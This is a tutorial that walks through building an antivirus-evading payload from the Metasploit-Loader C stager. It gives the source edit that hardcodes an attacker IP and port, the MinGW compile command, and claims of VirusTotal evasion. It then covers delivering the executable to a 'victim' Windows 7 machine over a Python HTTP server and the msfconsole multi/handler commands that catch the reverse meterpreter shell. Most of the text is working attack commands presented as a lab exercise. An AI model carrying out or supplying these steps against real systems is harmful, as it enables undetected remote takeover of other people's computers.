Bypassing AV through Metasploit Loader 32-Bit
Bypassing AntiViruses in VirusTotal, through generating a payload using Metasploit Loader 32-Bit.
Metasploit-Loader is a quick stager client, written in C programming language (easy to understand) compatible with the Metasploit Framework, created by Raphael Mudge (rsmudge).
Metasploit-Loader will connect with the Metasploit, fetch the DLL, will load it in Memory & pass the control back to us.
STEPS:
1. Download & Save Metasploit-Loader:
Use Link: Metasploit-Loader
Use Commands: git clone https://github.com/rsmudge/metasploit-loader.git
Install Metasploit-Loader:
2. Edit the Main.c file:
Make changes in the main.c > int main file in metasploit-loader/master/src/main.c as shown in figure below:
In main.c:
if (argc != 3) {
printf(“%s [host] [port]\n”, argv[0]);
exit(1);
}/* connect to the handler */
SOCKET my_socket = wsconnect(argv[1], atoi(argv[2]));Replace the above line of codes with below:
/* connect to the handler */
SOCKET my_socket = wsconnect(“192.168.137.128”, 9500));
Save the file main.c.
Here, attacker’s IP & Port is 192.168.137.128 & 9500.
3. Generating exe file by Compiling main.c with a MinGW compiler:
Use Commands: i686-w64-mingw32-gcc main.c -o loadmeta.exe -lws2_32
To compile main.c & generate an executable file loadmeta.exe.
Transfer the exe file to the victim’s machine (Windows 7)
4. Test the Executable against the AntiVirus:
You can verify the Payload against the AntiViruses, that file goes undetected.
If you scan the executable file over VirusTotal it goes undetected for many of the AntiVirus, like- AVG, Avast, PaloAlto, Tencent, Malware Bytes, Alibaba, Cat-QuickHeal, etc,.
5. Transfer Payload to Victim’s Machine:
Transfer the exe file to the victim’s machine (Windows 7)
Here, we are using a Simple Python HTTP Server to transfer the Executable file to Victim’s Machine, which will act as a Reverse_Payload & connect back to the attacker’s Machine (Kali).
Use Commands: python -m SimpleHTTPServer
6. Start Multi Handler:
Start a multi handler on the Attacker’s Machine that will connect back to the reverse_tcp meterpreter, coming from the Victim.
Use Commands:
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST 192.168.137.128
> set LPORT 9500
> exploit
7. Download & Run the Payload:
Connect to the HTTP Server with the victim’s machine. Download & Run the Executable file.
Also, Windows 7 AntiVirus shows no warning against the Payload — loadmeta.exe.
Run the executable file:
8. Reverse_Shell at Attacker’s Machine:
Now, check the Handler, a reverse meterpreter shell session has been created by the Metasploit-Loader, from the Victim’s Machine.
Use Commands: getuid // to verify the source.
In the next session: Bypassing AV through Metasploit Loader 64-Bit
References:
1. Metasploit-Loader
2. MinGw Complier
3. VirusTotal
Thanks!👾